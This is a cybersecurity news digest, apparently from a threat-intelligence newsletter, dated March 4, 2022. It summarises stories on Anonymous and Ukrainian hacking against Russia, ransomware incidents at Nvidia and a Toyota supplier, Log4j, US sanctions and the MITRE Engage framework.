Daily Drop(66)

3-4-22

Friday, March 04, 2022 // (IG): BB //Weekly Sponsor: ISG

“Anonymous” Hacker Collective Declares Cyber War Against Russian Government Over Ukraine Invasion

FROM THE MEDIA: The hacker collective “Anonymous,” famous for engaging in hacktivism campaigns since the early 2000s, has pledged to digitally fight against Russia as it invades Ukraine. The group has been active in its cyber war in the early days, leaking Russian Ministry of Defense documents and cutting into Russian television feeds among other actions. The move continues a sharp focus on activism for the group, which has ranged across a broad variety of targets (from NASA and the Canadian government to ISIS and the Ku Klux Klan). After a period of dormancy that lasted several years, the group re-emerged in 2020 with a long string of campaigns that appear to strongly favor Democrat domestic political interests and general United States foreign policy positions. The group’s alignments raise the question of its actions being viewed as a US-supported attack on Russia, possibly escalating the situation and leading to retaliation as the hacker collective threatens to take the country’s industrial control systems “hostage.”

READ THE STORY:  CPO Magazine // Wired

A QUICK LOOK: 

White House backs bill requiring mandatory cyber reporting to CISA amid Ukraine crisis

FROM THE MEDIA:  The White House has come out in full support of a bill requiring hospitals, power plants, water utilities, airports and other critical infrastructure to report cyber attacks to the Department of Homeland Security within 72 hours. The move comes amid the escalating war in Ukraine and concerns of possible Russian cyber threats to the U.S.  In a statement confirming the White House's support, a spokesperson said the legislation is "a part of the Administration's comprehensive effort to modernizing America's cyber defenses and complements the President's efforts to improve cybersecurity." The White House underscored that the bill will "ensure the Federal government rapidly receives information about cyber incidents affecting critical infrastructure which provide the essential services on which Americans rely," enabling the government to "better investigate, mitigate, and further prevent cyber-attacks." Yet in their statement, the White House left the door open to future changes, indicating it "remains committed to working with the House, and exploring all options, to ensure that the legislation enables all relevant Federal agencies to receive and process these incident reports as quickly as possible to carry out their cybersecurity missions."

READ THE STORY:  CBS News

A QUICK LOOK: 

Ukraine cyber group to strike at Russia's critical infrastructure

FROM THE MEDIA: A Ukrainian cyber guerrilla warfare group is planning to strike back against Russia, targeting the country’s critical infrastructure amid the Russian invasion of Ukraine. Ukraine’s Defense Ministry asked the group, led by cybersecurity expert Yegor Aushev, to use its cyber capabilities to disrupt railways and electrical grids and stanch the flow of weapons flowing from Russia, according to Reuters.  Aushev told Reuters on Monday that they will do what it takes to stop the war, including launching hacking attacks. “The goal is to make it impossible to bring these weapons to our country,” he said, adding that his group has already targeted dozens of Russian government and banking websites. Aushev also said that his group has garnered more than 1,000 Ukrainian and foreign volunteers. The cyber warfare between the two countries has escalated in recent weeks. Ukraine was on defense last week after several of its government websites were hit by a cyberattack believed to originate from the Russians. 

READ THE STORY:  The Hill // HT Tech

A QUICK LOOK: 

Accelerated Ransomware Attacks Pressure Targeted Companies to Speed Response

FROM THE MEDIA:  Threat actors have focused on two ends of the spectrum — quick, impactful attacks or stealthy intrusions — making strong prevention and faster response more important for enterprises. Ransomware attackers have taken a variety of incremental steps over the past year that have resulted in shorter infection-payload cycles — requiring businesses to more quickly respond to potential malicious behavior. In its "2022 Cyber Threat Landscape Report" published this week, Deep Instinct said that its data shows that execution, persistence, and privilege escalation were the top three attacker actions, as defined by the MITRE ATT&CK framework, suggesting that adversaries had focused on initial infiltration and payload execution as opposed to extensive lateral movement. In addition, the increased adoption of ransomware-as-a-service (RaaS), which is easily accessible on the Dark Web, has resulted in a 15% increase in detected ransomware threats, according to the report. The threat landscape is going to be extremely treacherous in coming months, especially as cyber operations escalate because of Russia's war on Ukraine, making defensive agility very important, says Shimon Oren, vice president of threat research and AI intelligence for Deep Instinct.

READ THE STORY:  Darkreading

A QUICK LOOK:

Cybercriminals who breached Nvidia issue one of the most unusual demands ever

FROM THE MEDIA: Data extortionists who stole up to 1 terabyte of data from Nvidia have delivered one of the most unusual ultimatums ever in the annals of cybercrime: allow Nvidia's graphics cards to mine cryptocurrencies faster or face the imminent release of the company's crown-jewel source code. A ransomware group calling itself Lapsus$ first claimed last week that it had hacked into Nvidia's corporate network and stolen more than 1TB of data. Included in the theft, the group claims, are schematics and source code for drivers and firmware. A relative newcomer to the ransomware scene, Lapsus$ has already published one tranche of leaked files, which among other things included the usernames and cryptographic hashes for 71,335 of the chipmaker's employees. The group then went on to make the highly unusual demand: remove a feature known as LHR, short for "Lite Hash Rate," or see the further leaking of stolen data. "We decided to help mining and gaming community," Lapsus$ members wrote in broken English. "We want nvidia to push an update for all 30 series firmware that remove every lhr limitations otherwise we will leak hw folder. If they remove the lhr we will forget about hw folder (it's a big folder). We both know lhr impact mining and gaming."

READ THE STORY:  Arstechnica

A QUICK LOOK:

Cyber-Attack on New York Ethics Watchdog

FROM THE MEDIA: New York State’s Joint Commission on Public Ethics (JCOPE) has been forced to shut down its systems following a “deliberate malicious cyber-attack.” The ethics watchdog, which regulates lobbying at the State Capitol, said on Friday that an investigation had been launched to determine the scope of the attack and who was behind it. The alarm was raised at the beginning of last week by workers at the New York Office of Information Technology Services (ITS) who received an alert regarding suspicious activity on JCOPE’s network. The Commission shut down systems, including its lobbying application and financial disclosure statement online filing system as a precaution. JCOPE said the attack was confirmed following “several days of preliminary forensic analysis by ITS.” No timeline has been given as to when the systems will be back up and running, with JCOPE saying only that the systems will remain offline “until they can be brought back up safely.” An investigation into the incident has been launched. However, a suspect is yet to emerge. 

READ THE STORY:  Info Security

Toyota Group resumes production in Japan after major supplier hit by ransomware. Here are the series of events

FROM THE MEDIA: One of the largest automotive manufacturers, Toyota, was forced to halt its operations in Japan after a key parts supplier became a victim of a cyberattack. On Monday, 28th of February 2022, Toyota made an official statement saying, “Due to a system failure at a domestic supplier (Kojima Industries Corporation), we have decided to suspend the operation of 28 lines at 14 plants in Japan on Tuesday, March 1st (both 1st and 2nd shifts).” According to the supplier, Kojima Industries – not to be confused with Japanese game developer, Kojima Productions – it received “a threatening message” on Saturday 26th of February 2022, which it later confirmed as ransomware.  The following Monday, an official close to Kojima Industries told the Japanese business daily, Nikkei, “It is true that we have been hit by some kind of cyberattack. We are still confirming the damage and we are hurrying to respond, with the top priority of resuming Toyota’s production system as soon as possible.” The official also added that Toyota representatives and cybersecurity experts are at Kojima Industries to determine the cause. Then on Tuesday, Kojima industries announced that it had found a virus in its servers.

READ THE STORY:  Soyacincau

A QUICK LOOK:

Log4j Forced a Cybersecurity Wake-Up Call

FROM THE MEDIA:  It’s been nearly four months since Alibaba Cloud’s security team first reported a remote code execution (RCE) vulnerability within Apache Log4j (also known as Log4Shell). Due to the popularity and widespread use of this application, it very quickly became a top priority for security operatives and administrators around the world. Within weeks, Apache issued a patch for the logging library vulnerability (CVE-2021-44228), accompanied by the highest severity rating of 10.0. Despite the quick response, it is estimated that more than 89% of all environments across businesses and cloud providers have vulnerable Log4j libraries. This particular RCE vulnerability posed an enormous threat to affected organizations, given how widely used the application is around the globe. Suddenly, adversaries had unlimited administrative access to a very vulnerable system. It was all hands on deck to try and get on top of the vulnerability. At the same time, threat intelligence sources started reporting mass scanning activity from several hosts checking for severs using Apache Log4j—the hunters had arrived. From past experiences, experts concluded that attacks on RCE vulnerabilities usually began with automated reconnaissance scans to first identify targets with vulnerable versions of the software. Attackers then exploited the vulnerability using a uniquely crafted string which is processed by the vulnerable Log4j component, enabling unauthenticated remote code execution, potentially resulting in full access to the target system by the attacker.

READ THE STORY:  Security Boulevard

A QUICK LOOK:

Treasury Department sanctions alleged Russian cyber-espionage, disinformation sources

FROM THE MEDIA: The Biden administration on Thursday sanctioned Russian oligarchs and organizations for their role in spreading disinformation and supporting Russian President Vladimir Putin’s war in Ukraine, among them a news agency the Treasury Department says has ties to a Russian cyber-espionage and offensive unit. The sanctions targeted nine employees of InfoRos, a nominal news agency primarily run by the GRU, which controls the Russian military intelligence service and operates its own special forces units. According to the Treasury Department, the GRU’s 72nd Main Intelligence Information Center, a unit within Russia’s Information Operations Troops, functions as Russia’s “military force for conducting cyber espionage, influence, and offensive cyber operations” and is InfoRos’ operator. In a news release, the Treasury Department said InfoRos is a network of more than 1,000 websites which “spread false conspiracy narratives and disinformation promoted by GRU officials.” For example, in early December, 2021, Treasury officials said one Ukraine-based InfoRos writer contributed an editorial which argued Ukraine was provoking Russia into war.

READ THE STORY:  CyberScoop

A QUICK LOOK:

MITRE Engage framework provides defense strategies for the cyber defense community

FROM THE MEDIA: Informed by adversary behavior observed in the real world, Engage helps chief information security officers (CISOs), cyber defenders, and vendors to implement defense strategies. Adversary engagement and deception operations can cut the cost of a data breach in half, waste an adversary’s time, and make attackers easier to detect. Engage maps to the MITRE ATT&CK framework, which enables practitioners to quickly identify an attacker’s vulnerabilities when using a specific ATT&CK technique and how to take advantage of those vulnerabilities. “Engage is about empowering the cyber defense community,” said Maretta Morovitz, MITRE Engage lead. “Every day, adversaries launch cyber attacks. Some will always slip through. Taller walls aren’t the complete solution. We need to stop what we can and be prepared to engage with the ones who make it through. With traditional cyber defense, the adversary only needs to be right once, but with cyber deception, the adversary only needs to be wrong once.” Building upon MITRE’s Shield framework and more than 10 years of operational experience, Engage defines a common terminology for the cyber defense community.

READ THE STORY:  Helpnetsecurity

A QUICK LOOK:

"Putin is using Iran for his cyber warfare"

FROM THE MEDIA: “Russia and China will continue to be forces that will cause a lot of trouble in the Western world as agents of chaos, but in the end people are looking for freedom - so the situation will change for the better,” says cyber expert Morgan Wright, Chief Security Advisor at Israeli cyber unicorn SentinelOne. Iran may be many kilometers from the Russia-Ukraine war, but there is a connection between the two fronts, one most people aren’t really aware of. "I grew up in Iran," Morgan Wright, Chief Security Advisor at Israeli cyber unicorn SentinelOne says with a smile. "I know their mentality and even understand Persian because I was there as a child." Wright may seem like a likable American with gray hair and a carefully trimmed beard, but as an expert in security he has hopped between jobs in the CIA and the NSA and has advised and assisted governments and cyber companies. Wright is an expert on cyber strategy, online terrorism, national security and intelligence. He serves as a senior fellow at the Center for Digital Governance, a research institute of the U.S. Federal Government that deals with digital and governance issues. He also serves as a senior consultant and expert on the Fox network. He has testified more than once in government committees, including the need to change the way the U.S. government collects identifying data in its digital healthcare system (healthcare.gov). He taught NSA agents behavioral analysis and spent about 18 years in uniform at various law enforcement agencies. Beyond that, he has also developed quite a few solutions for technology giants such as Cisco, Unisys or Alcatel-Lucent. When Wright says that Russia and Iran are cooperating in the cyber field, it is worth listening to him because it also concerns us.

READ THE STORY:  Calcalistech

A QUICK LOOK:

Items of interest

The Iran-Russia Cyber Agreement and U.S. Strategy in the Middle East(Article)

FROM THE MEDIA: This January, Russian Foreign Minister Sergey Lavrov and his Iranian counterpart Javad Zarif signed a cooperation agreement on cybersecurity and information and communications technology (ICT). The agreement includes cybersecurity cooperation, technology transfer, combined training, and coordination at multilateral forums, like the United Nations.

READ THE STORY:  CFR

Spokesman From ALPHV (Blackcat) Talks About The Group's Intentions For A Ransomware 'meta-Universe’(Video)

FROM THE MEDIA: Last year, the cybersecurity experts started noticing a ransomware variant known as ALPHV, which stood out as unusually smart and written mainly in the Rust language of programming—a 1st real-world malware. According to reports published earlier in the week, German cybersecurity experts suspect the gang is behind the latest scam on 2 German transport companies that resulted in oil supply interruptions at several service stations. In several reports, a member of the gang, which is being referred to as BlackCat, consented to speak with Dmitry Smilyanets, an analyst at Recorded Future, about the gang's history, aims, and future ambitions. In response to the DS questions, the representative discussed the following things:ALPHV is the only name that we have. The Record created BlackCat, while Symantec created BC.aNoberus. Because we are all adverts, we are linked to gandrevil, blackside, mazegreggor, lockbit, and so on. Without exaggerating, we feel there is still no rival software in the market. For advanced clients, along with high-quality technology, we offer the whole variety of services associated with ransom — premium concierge or metaverse, call it what you want.

Cyber Attacks in Ukraine, Russia & Around the World(Video)

FROM THE MEDIA: As Russian ground forces advance in Ukraine, experts are watching how warfare may play out online. They're pointing to a powerful new data-wiping form of malware designed by Russian hackers, as well as the 'Anonymous' hacker group's recent declaration of war against Russia.

About this Product

These open source products are reviewed from analysts at InfoDom Securities and provide possible context about current media trends in regard to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not specifically endorse any third-party claims made in their original material or related links on their sites, and the opinions expressed by third parties are theirs alone. Contact InfoDom Securities at dominanceinformation@gmail.com